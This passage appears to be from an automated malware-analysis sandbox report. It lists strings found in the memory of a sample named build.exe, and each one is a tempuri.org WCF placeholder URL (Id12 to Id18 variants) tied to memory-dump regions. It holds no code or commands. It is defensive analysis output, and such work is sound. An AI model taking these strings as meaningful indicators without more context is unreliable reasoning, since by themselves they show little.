                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11ResponsehD
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12LR
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12ResponsehD
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13LR
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13ResponsehD
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14LR
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14ResponsehD
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15LR
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15ResponsehD
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16LR
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16ResponsehD
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17LR
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17ResponsehD
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
